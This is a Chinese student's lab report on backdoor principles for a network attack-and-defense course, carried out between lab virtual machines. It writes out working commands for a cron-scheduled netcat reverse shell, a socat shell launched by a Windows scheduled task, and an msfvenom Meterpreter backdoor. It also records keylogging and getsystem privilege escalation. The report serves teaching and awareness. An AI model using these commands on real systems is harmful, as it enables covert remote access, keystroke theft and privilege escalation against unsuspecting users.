20145312 《网络对抗》 后门原理与实践
基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式?
- 在所谓软件之家的网站下载应用软件时,安装过程中附带的可能就有后门程序。
- 垃圾邮件中的链接点开后可能就安装了后门程序。
2.例举你知道的后门如何启动起来(win及linux)的方式?
- windows:通过启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序,修改注册表。
- linux:通过在cron启动、通过和其他程序捆绑运行后门程序。
3.Meterpreter有哪些给你映像深刻的功能?
- 可以启动目标主机摄像头,可以监听键盘,可以录制音频.,可以提权......
4.如何发现自己有系统有没有被安装后门?
- 一般后门程序常见的杀毒软件就可以查杀,win10自带的Windows Defender也有同样作用。
- 可以下载一些比较专业的监视软件进行监听检测。
- 检查防火墙开启的端口和它对应的进程,如果不是系统默认开启的端口都有嫌疑,找到对应的进程,对其进行抓包分析。
实验内容和步骤
1. ncat的使用
使用nc传输数据
- 本实验中我在VMWare中实现Linux和Windows主机间的互联
Windows获得Linux的Shell
-
在Kali环境下,反向连接Windows主机的5312端口:
-
Windows下成功获得了一个Kali的shell,运行ls指令如下:
Linux获得Windows Shell
-
在Windows下,反向连接Kali主机的5312端口:
-
在虚拟机中获得了windows的shell之后我输入了ipconfig,成功查看到了windows本机的ip地址信息
cron的启动
- 这里首先在linux中输入crontab -e指令,通过编辑增加一条定时任务,我输入的是
08 * * * * /bin/netcat 10.1.1. 165 5312 -e /bin/sh意味着在每个小时的08分,如果有一台ip地址为10.1.1.165 通过端口5312的主机监听着linux,就会得到一个shell
2. socat获取主机操作Shell
-
在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务名为:20145312,触发器为:当锁定任何用户的工作站时。在操作->程序或脚本中选择我的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5312 exec:cmd.exe,pty,stderr
-
创建完成之后,锁定计算机再次打开时,可以发现之前创建的任务已经开始运行:
-
此时,在Kali环境下输入指令socat - tcp:10.1.1.165:5312,此时可以发现已经成功获得了一个cmd shell:
3. meterpreter的使用
使用meterpreter监听靶机
-
输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.1.1.212 LPORT=5312 -f exe > 20145312_backdoor.exe后,并将生成的后门程序传送到Windows主机上后,在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
-
设置完成后,执行监听,打开Windows上的后门程序,此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
使用meterpreter对靶机进行键盘监听和提权
-
使用
keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
-
使用
getuid指令查看当前用户,使用getsystem指令进行提权
实验总结与体会
- 本次“后门原理与实践”实验,让我意识到任何电脑系统都不是绝对安全的。尤其是做meterpreter实践时,不仅监听了键盘输入还获得了提权,意味着我不仅能够窃取用户信息还可以在靶机上为所欲为了。这警示了我要养成即使补丁防火墙漏洞,定时杀毒等习惯。